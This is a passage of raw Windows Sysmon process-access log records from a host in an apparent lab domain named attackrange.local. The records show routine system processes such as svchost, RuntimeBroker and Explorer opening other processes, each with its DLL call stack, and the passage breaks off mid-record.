13:30:10.810{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.810{08A6967A-4754-6000-1705-000000009A01}34085408C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\wpncore.dll+38cbd|C:\Windows\System32\wpncore.dll+3794e|C:\Windows\System32\wpncore.dll+230b3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000011193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.810{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.810{08A6967A-4754-6000-1705-000000009A01}34085408C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\wpncore.dll+38cbd|C:\Windows\System32\wpncore.dll+38c00|C:\Windows\System32\wpncore.dll+23077|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000011191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.810{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4754-6000-1705-000000009A01}34085408C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\wpncore.dll+38cbd|C:\Windows\System32\wpncore.dll+3794e|C:\Windows\System32\wpncore.dll+230b3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000011187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4754-6000-1705-000000009A01}34085408C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\wpncore.dll+38cbd|C:\Windows\System32\wpncore.dll+38c00|C:\Windows\System32\wpncore.dll+23077|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000011186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8700-000000009A01}4792C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8500-000000009A01}4280C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\W